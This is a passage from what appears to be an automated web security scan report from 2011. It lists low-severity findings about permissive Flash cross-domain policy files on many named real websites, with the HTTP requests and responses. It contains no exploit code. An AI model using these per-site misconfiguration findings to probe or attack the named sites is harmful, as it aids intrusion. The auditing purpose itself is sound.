<allow-access-from domain="*.ge.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="*.ivillage.com" />
<allow-access-from domain="devworks.ivillage.com" />
<allow-access-from domain="devi.ivillage.com" />
<allow-access-from domain="i.ivillage.com" />
<allow-access-from domain="www.ivillage.com" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.tvpdigital.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="apps.eyewonderlabs.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="fjpecvaa.joyent.us" />
<allow-access-from domain="widget.bravotv.com" />
<allow-access-from domain="*.jwtdev.com" />
<allow-access-from domain="*.jwtweb.com" />
<allow-access-from domain="*.na.jnj.com" />
<allow-access-from domain="*2mdn.net" />
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...

7.478. http://www.webshots.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.webshots.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.webshots.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:05 GMT
Server: Resin/3.0.23
ETag: "Hn4QveNaujs"
Last-Modified: Thu, 17 Mar 2011 13:19:16 GMT
Set-Cookie: AB_ID=2985706610117927138; domain=.webshots.com; path=/; expires=Fri, 28-Mar-2031 13:28:19 GMT
Set-Cookie: session_source=webs; domain=.webshots.com; path=/
Content-Type: text/xml
Content-Length: 419
Set-Cookie: NSC_ed3-xt-bqq-cbdlfoe-mc=e24d345029a0;path=/
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*" sec
...[SNIP]...
<allow-access-from domain="*.webshots.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.webshots.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.imgag.com" secure="false" />
...[SNIP]...

7.479. http://www.weightwatchers.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.weightwatchers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weightwatchers.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1209600
Content-Length: 285
Content-Type: text/xml
Last-Modified: Tue, 22 Dec 2009 11:25:24 GMT
Accept-Ranges: bytes
ETag: "0ea1c74f982ca1:247"
CP: CAO DSP CURa ADMa DEVa TAIa PSAa IVAa CONi OTPa OUR SAMa STP PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:38 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />
   <allow-access-from domain="*.weightwatchers.com" />
   <allow-http-reques
...[SNIP]...

7.480. http://www.wetpaint.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wetpaint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wetpaint.com

Response

HTTP/1.1 200 OK
Age: 0
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:58:41 GMT
Last-Modified: Fri, 14 May 2010 18:42:05 GMT
Server: prod7
Vary: Accept-Encoding
X-Cache: MISS
Content-Length: 247
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...

7.481. http://www.whitehouse.gov/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitehouse.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.whitehouse.gov

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 30 Mar 2011 23:01:41 GMT
Content-Type: text/xml
Cache-Control: max-age=275
Expires: Sat, 02 Apr 2011 13:54:56 GMT
Date: Sat, 02 Apr 2011 13:50:21 GMT
Content-Length: 399
Connection: close
Server: White House
P3P: CP="NON DSP COR ADM DEV IVA OTPi OUR LEG"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="stage-creative.myspacecdn.com"/>
   <allow-access-from domain="creative.myspacecdn.com"/>
   <allow-access-from domain="*.myspacecdn.com"/>
...[SNIP]...

7.482. http://www.wimp.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wimp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wimp.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "795047349"
Last-Modified: Wed, 29 Apr 2009 18:43:54 GMT
Content-Length: 154
Connection: close
Date: Sat, 02 Apr 2011 13:26:05 GMT
Server: lighttpd/1.4.28

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.wimp.com" />
</cross-domain-policy>

7.483. http://www.wn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wn.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:49 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Mon, 22 Jan 2007 20:02:38 GMT
ETag: "305856-101-427a68b105380"
Accept-Ranges: bytes
Content-Length: 257
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.wn.com" />
<allow-access-from domain="*.worldnews.com" />
...[SNIP]...

7.484. http://www.womansday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.womansday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.womansday.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 10 Sep 2009 09:12:36 GMT
Accept-Ranges: bytes
Content-Length: 224
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:04:47 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>

<allow-access-from domain="*.hfmus.com" />
<allow-access-from domain="hfm.checkm8.com" />
<allow-access-from domain="*.womansday.com" />


...[SNIP]...

7.485. http://www.worldwinner.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.worldwinner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.worldwinner.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:16 GMT
Server: Apache
Last-Modified: Mon, 20 Oct 2003 15:12:42 GMT
Accept-Ranges: bytes
Content-Length: 388
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR NID TAIi OUR NOR CNT", CP="NOI DSP COR NID TAIi OUR NOR CNT"
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<!--
allows flash player 7 to post within worldwinner [flash solitaire:
...[SNIP]...
<allow-access-from domain='*.worldwinner.com' />
...[SNIP]...

7.486. http://www.wsbtv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wsbtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wsbtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
X-IBS-CCDS-VERSION: 2.16.16
X-IBS-CCDS-ORIGIN: origin131
Accept-Ranges: bytes
Content-Length: 132
Content-Type: text/xml
Cache-Control: max-age=60671
Expires: Sun, 03 Apr 2011 06:41:45 GMT
Date: Sat, 02 Apr 2011 13:50:34 GMT
Connection: close
Set-Cookie: alpha=47ce8f18567b0000aa29974d2ae80100802b0000; expires=Tue, 30-Mar-2021 13:50:34 GMT; path=/; domain=.wsbtv.com

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*.wsbtv.com" />
</cross-domain-policy>

7.487. http://www.wwe.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wwe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wwe.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 23 Mar 2011 21:35:31 GMT
ETag: "69991f7-1d5-49f2d23deeec0"
Server: Apache/2.2.17
X-App: p5tyr2
Content-Type: application/xml
X-Varnish: 1285448186
X-CacheTyr-Server: p5tyr2
X-CacheTyr: MISS
Content-Length: 469
X-CacheKyte-Server: p5kyte7
X-CacheKyte: HIT
X-CacheKyte-Hits: 1
Cache-Control: public, max-age=8077
Date: Sat, 02 Apr 2011 13:39:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="localhost" />
<allow-access-from domain="*.wwe.com" />
<allow-access-from domain="*.wrestlemania25.com"/>
<allow-access-from domain="*.wwekids.com"/>
<allow-access-from domain="wwe.mylaunchpad.com.my"/>
<allow-access-from domain="*.brightcove.com"/>
...[SNIP]...

7.488. http://www.yallwire.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.yallwire.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yallwire.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:51 GMT
Server: Apache/2.2.16 (Unix)
Vary: Accept-Encoding
Content-Length: 526
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.blastro.com" />
<allow-access-from domain="*.roxwel.com" />
<allow-access-from domain="*.yallwire.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.adxcel.com"/>
<allow-access-from domain="*.dev.adxcel.com"/>
...[SNIP]...

7.489. http://www.yellowpages.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yellowpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:07 GMT
Status: 200 OK
Connection: close
Server: nginx
Content-Type: text/xml
Content-Length: 356
Last-Modified: Fri, 01 Apr 2011 18:25:22 GMT
Expires: Sat, 02 Apr 2011 12:43:06 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
Set-Cookie: b=10010; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yellowpages.com" />
<allow-access-from domain="yellowpages.com" />
<allow-access-from domain="*.ypcdn.com" />
<allow-access-from domain="localhost" />
...[SNIP]...

7.490. http://www.yontoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.yontoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yontoo.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 18:22:44 GMT
Accept-Ranges: bytes
ETag: "70f545a1d0efcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET 2x8
Date: Sat, 02 Apr 2011 13:33:19 GMT
Connection: close
Content-Length: 274

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.pagerage.com"/>
...[SNIP]...

7.491. http://www.zap2it.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zap2it.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zap2it.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 265
Content-Type: text/xml
Last-Modified: Fri, 18 Jun 2010 02:41:30 GMT
ETag: "109-4c1adcda"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:37:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...

7.492. http://www.zappos.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zappos.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zappos.com

Response

HTTP/1.0 200 OK
Server: nginx/0.9.4
Content-Type: application/xml
Last-Modified: Thu, 31 Mar 2011 18:07:44 GMT
Content-Length: 236
X-Core-Value: 6. Build Open and Honest Relationships With Communication
X-Recruiting: If you're reading this, maybe you should be working at Zappos instead. Check out jobs.zappos.com
X-UUID: 6ec4abb8-5bda-11e0-9784-00215e22e1de
Date: Sat, 02 Apr 2011 13:31:01 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="overlay.tv" secure="false"/><allow-access-from domain="*.overlay.tv" secure="false"/><allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...

7.493. http://www.zazzle.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zazzle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zazzle.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Mon, 08 Nov 2010 08:13:34 GMT
Accept-Ranges: bytes
ETag: "328bbdd61c7fcb1:0"
Server: Microsoft-IIS/7.5
Date: Sat, 02 Apr 2011 13:35:14 GMT
Connection: keep-alive
Content-Length: 894

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.zazzle.com" />
   <allow-access-from domain="*.zazzle.co.uk" />
   <allow-access-from domain="*.zazzle.com.au" />
<allow-access-from domain="*.zazzle.ca" />
<allow-access-from domain="*.zazzle.co.nz" />
<allow-access-from domain="*.zazzle.de" />
<allow-access-from domain="*.zazzle.pt" />
<allow-access-from domain="*.zazzle.com.br" />
<allow-access-from domain="*.zazzle.es" />
<allow-access-from domain="*.zazzle.fr" />
<allow-access-from domain="*.zazzle.co.jp" />
<allow-access-from domain="*.zcache.com" />
   <allow-access-from domain="*.myspace.com" />
   <allow-access-from domain="*.myspacecdn.com" />
...[SNIP]...

7.494. http://www.zmags.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zmags.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zmags.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Nov 2010 14:17:20 GMT
ETag: "45241c8-143-49426b3059c00"
Server: Apache
Accept-Ranges: bytes
Content-Length: 323
Content-Type: text/xml
Cache-Control: max-age=1044180
Expires: Thu, 14 Apr 2011 16:06:24 GMT
Date: Sat, 02 Apr 2011 14:03:24 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.zmags.com"/>
...[SNIP]...

7.495. http://www.zshare.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zshare.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zshare.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
ETag: "161515371"
Accept-Ranges: bytes
Last-Modified: Thu, 12 Aug 2010 12:10:48 GMT
Content-Length: 278
Connection: close
Date: Sat, 02 Apr 2011 14:00:58 GMT
Server: lighttpd/1.5.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.zshare.net"/>
<allow-http-req
...[SNIP]...

7.496. http://www.zwinky.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zwinky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zwinky.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Last-Modified: Fri, 03 Dec 2010 20:55:45 GMT
ETag: "1a9777a-1b5-49687c322009a"
Accept-Ranges: bytes
Content-Length: 437
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*.myfuncards.com" />
   <allow-access-from domain="*.webfetti.com" />
   <allow-access-from domain="*.zwinky.com" />
...[SNIP]...

7.497. http://www.zynga.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zynga.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zynga.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 17 Sep 2010 16:52:50 GMT
ETag: "18008ac-130-4907764977c80"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.zynga.com" />
   <allow-access-from domain="*.jobvite.com" />
   <allow-access-from domain="*.fishville.net" />
...[SNIP]...

7.498. http://www.active.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.active.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.active.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 29 Jan 2010 22:51:52 GMT
ETag: "aeeb9a-d9-7b40b200"
Accept-Ranges: bytes
Content-Length: 217
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:45:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:45:18 GMT
Connection: close
Set-Cookie: BIGipServeractive.com_http=3775726090.20480.0000; expires=Sat, 02-Apr-2011 17:45:18 GMT; path=/

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="nike-dev2.ny.rga.com"/>
   <allow-access-from domain="env1-plus.nike.com"/>
   <allow-access-from domain="nikeplus.nike.com"/>
</cro
...[SNIP]...

7.499. http://www.allmenus.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allmenus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allmenus.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:09 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 15:23:46 GMT
ETag: "92803e-2a7-47f54bca8c480"
Accept-Ranges: bytes
Content-Length: 679
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="www.campusfood.com" />
   <allo
...[SNIP]...
<allow-access-from domain="allmenus.com" />
   <allow-access-from domain="campusfood.com" />
   <allow-access-from domain="i-allmenus.com" />
   <allow-access-from domain="intranet.campusfood.com" />
   <allow-access-from domain="post-gazette.com" />
   <allow-access-from domain="www.post-gazette.com" />
   <allow-access-from domain="restaurants.post-gazette.com" />
   <allow-access-from domain="restaurants.philly.com" />
...[SNIP]...

7.500. http://www.autotrader.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.autotrader.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:48 GMT
Server: Apache
Set-Cookie: v1st=29C45FC3ABC999DF; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1301750748369073; path=/; expires=Thu, 12-Mar-15 13:25:48 GMT; domain=.autotrader.com
Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT
Accept-Ranges: bytes
Content-Length: 221
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/xml
Set-Cookie: BIGipServerAT-Production_hhtp=376792586.61475.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="ads.autotrader.com" />
</
...[SNIP]...

7.501. http://www.autotraderstatic.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotraderstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.autotraderstatic.com

